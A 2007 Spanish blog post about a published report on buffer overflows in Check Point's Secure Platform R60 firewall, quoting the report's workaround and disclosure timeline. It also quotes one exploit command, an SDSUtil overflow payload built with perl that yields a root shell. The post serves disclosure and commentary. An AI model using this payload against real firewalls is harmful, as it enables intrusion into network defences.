1 de Octubre de 2007
Buffer overflows en Check Point, by Pentest
Por si fuera de tu interés, acabamos de publicar un informe -en inglés- donde
se relata todo el proceso de explotación sobre varios fallos -buffer
overflows- del cortafuegos Check Point. En concreto se ha evaluado la versión
Secure Platform R60 que había sido certificada por la NSA y el NIST con un
nivel EAL4+. En el informe se pone de manifiesto la debilidad de los procesos
de certificación realizados por el gobierno de los EEUU.
http://www.checkpoint.com/press/2006/ealusgov100406.html
http://www.pentest.es/checkpoint_hack.pdf
---> Con franqueza, no entiendo nada, pero el .pdf está super currado, más de 200 páginas, y repleto de cosas como:
[Expert@fw1pentest]# ]# rm -f /var/log/dump/usermode/SDSUtil.* ; /opt/CPsuite-
R60/fw1/bin/SDSUtil -p 123123 123123 `perl -e 'print "B"x4'``perl -e 'print
"12345678"x1029'``perl -e 'print "\x50\x5c\x55\x77ABCD\x9a\xa8\x5d\x77"'`
bash: ]#: command not found
Info; OpenConn; Enable; NA
Error; OpenConn; Enable; Unresolved host name.
sh-2.05b# exit
exit
Segmentation fault (core dumped)
---> y dice esto:
What are the affected products?
It’s difficult to us to tell how many products, versions and platforms should be affected, but
I think that almost any CheckPoint product based on Secure Platform could be vulnerable. That
includes the UTM-1, etc. Also any platform having same binaries as the affected ones could be
vulnerable. So a lot of ChekPoint products should be affected…
Is there any workaround until the vendor releases patches?
Yes. The easy non-intrusive way is to monitor the directory were core dumps are created.
As an example, in the Secure Platform that is: “/var/log/dump/usermode/”. Write a script that
monitors for any change. If you can see files there… bad things are happening to your firewall.
---> Y también dice:
CheckPoint was first contacted on 19-03-07. Since them many other attempts were done
and at last we were redirected to our country –Spain-. We contacted the representative of Check Point at our country and many approaches attempts were made. The feedback was very
poor and after months of waiting we decided to release this work to the community.
